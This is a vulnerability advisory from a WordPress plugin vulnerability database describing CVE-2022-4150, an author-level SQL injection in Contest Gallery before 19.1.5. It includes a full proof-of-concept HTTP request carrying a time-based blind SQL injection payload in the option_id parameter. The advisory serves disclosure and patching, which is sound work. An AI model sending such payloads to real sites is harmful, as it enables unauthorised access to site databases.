WordPress Plugin Vulnerabilities

Contest Gallery < 19.1.5 - Author+ SQL Injection

Description

The plugins do not escape the option_id POST parameter before concatenating it to an SQL query in order-custom-fields-with-and-without-search.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.

Proof of Concept

POST /wp-admin/admin-ajax.php?option_id=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ) HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------14380037532152506451161945074
Content-Length: 1230
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668734427%7CUHijoj82qZ3zggyrkh30RBG6N1IDmWR8ZDV3fZNzCre%7C6333e4fa1fc3f8961218830b63c9910e36a1507d9530ee857dda65208e7bd3bf; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668734427%7CUHijoj82qZ3zggyrkh30RBG6N1IDmWR8ZDV3fZNzCre%7Cd34e5c9317c939593831376a9467f195ca7e97151d2f965acdbc84aeb291c5b7; wp-settings-time-5=1668467252; wp-settings-5=libraryContent%3Dbrowse
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------14380037532152506451161945074
Content-Disposition: form-data; name="action"

post_cg_gallery_view_control_backend
-----------------------------14380037532152506451161945074
Content-Disposition: form-data; name="cgGalleryHash"

355b5e0384230f74e41bc47f47d94aef
-----------------------------14380037532152506451161945074
Content-Disposition: form-data; name="cg_id"

1
-----------------------------14380037532152506451161945074
Content-Disposition: form-data; name="cg_start"

0
-----------------------------14380037532152506451161945074
Content-Disposition: form-data; name="cg_step"

10
-----------------------------14380037532152506451161945074
Content-Disposition: form-data; name="cg_order"

cg_input__for_id_4_id_desc
-----------------------------14380037532152506451161945074
Content-Disposition: form-data; name="cgVersionScripts"

19.1.4.1
-----------------------------14380037532152506451161945074
Content-Disposition: form-data; name="cg_search"


-----------------------------14380037532152506451161945074
Content-Disposition: form-data; name="cgBackendHash"

e12e8782da8ac6c4f1725d81a9811524
-----------------------------14380037532152506451161945074--

Affects Plugins

Plugin icon
contest-gallery
Fixed in 19.1.5
Plugin icon
contest-gallery-pro
Fixed in 19.1.5

References

CVE
CVE-2022-4150
URL
https://bulletin.iese.de/post/contest-gallery_19-1-4-1_13

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)
Submitter
Daniel Krohmer
Submitter website
https://iese.fraunhofer.de/en.html
Verified
Yes
WPVDB ID
d5d39138-a216-46cd-9e5f-fc706a2c93da

Timeline

Publicly Published
2022-12-05 (about 1 years ago)
Added
2022-12-05 (about 1 years ago)
Last Updated
2022-12-05 (about 1 years ago)

Other

Published
Title
Published
2021-08-22
Title
WP-Board <= 1.1 (beta) - Unauthenticated SQL Injection
Published
2022-04-13
Title
WP Video Gallery <= 1.7.1 - Unauthenticated SQLi
Published
2022-12-05
Title
Contest Gallery Pro < 19.1.5 - Admin+ SQL Injection
Published
2019-07-16
Title
Web Librarian < 3.5.5 - SQL Injection
Published
2024-03-25
Title
Media Library Assistant < 3.14 - Authenticated (Contributor+) SQL Injection via Shortcode